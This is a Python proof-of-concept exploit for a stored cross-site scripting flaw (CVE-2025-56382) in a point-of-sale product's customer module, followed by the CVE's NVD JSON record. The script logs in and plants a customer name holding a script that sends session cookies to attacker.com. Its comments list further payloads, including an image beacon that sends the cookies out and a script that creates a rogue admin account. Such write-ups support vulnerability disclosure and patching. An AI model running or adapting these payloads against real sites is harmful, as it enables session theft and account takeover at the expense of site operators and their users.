CVE-2025-56382

## Stored XSS Proof of Concept for CVE-2025-56382 ## Target: LionCoders SalePro POS 5.4.8 - Customer Management Module ## Vulnerability: Stored XSS via 'Customer Name' parameter import requests # Configuration TARGET_URL = "http://target-salePro-pos.com" USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Login to the application session = requests.Session() login_url = f"{TARGET_URL}/login" login_data = { "username": USERNAME, "password": PASSWORD } session.post(login_url, data=login_data) # Step 2: Inject malicious JavaScript payload via Customer Name parameter # The payload will steal session cookies and send them to attacker's server malicious_payload = '<script>fetch("http://attacker.com/steal?cookie="+document.cookie);</script>' customer_url = f"{TARGET_URL}/customers/create" customer_data = { "customer_name": malicious_payload, "email": "[email protected]", "phone": "1234567890", "address": "Test Address" } # Step 3: Submit the malicious customer data response = session.post(customer_url, data=customer_data) if response.status_code == 200: print("[+] Malicious customer profile created successfully") print("[+] When an admin views this customer, the XSS payload will execute") else: print(f"[-] Failed to create customer profile. Status code: {response.status_code}") # Alternative payload examples: # Payload 1: Cookie stealing # <script>document.location='http://attacker.com/steal?c='+document.cookie</script> # Payload 2: Session hijacking with image beacon # <img src=x onerror="fetch('http://attacker.com/log?data='+btoa(document.cookie))"> # Payload 3: Admin privilege escalation attempt # <script>fetch('/api/users/create',{method:'POST',body:JSON.stringify({username:'hacker',password:'hacked',role:'admin'}),headers:{'Content-Type':'application/json'}})</script>

{"cve": {"id": "CVE-2025-56382", "sourceIdentifier": "[email protected]", "published": "2025-10-06T18:15:51.407", "lastModified": "2025-10-15T18:34:36.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-site scripting (XSS) vulnerability exists in the Customer Management Module of LionCoders SalePro POS 5.4.8. An authenticated attacker can inject arbitrary web script or HTML via the 'Customer Name' parameter when creating or editing customer profiles. This malicious input is improperly sanitized before storage and subsequent rendering, leading to script execution in the browsers of users who view the affected customer details."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lion-coders:salepro_pos:5.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "E0947D6E-0A4E-4FAA-A872-901E0207EB48"}]}]}], "references": [{"url": "https://github.com/Auspicious-Rook/Vulnerability-Research/tree/main/CVE-2025-56382", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://preview.codecanyon.net/item/lims-stock-manager-pro-with-pos/full_screen_preview/22256829?_ga=2.221768668.538436323.1752589158-1013732256.1752073116", "source": "[email protected]", "tags": ["Product"]}]}}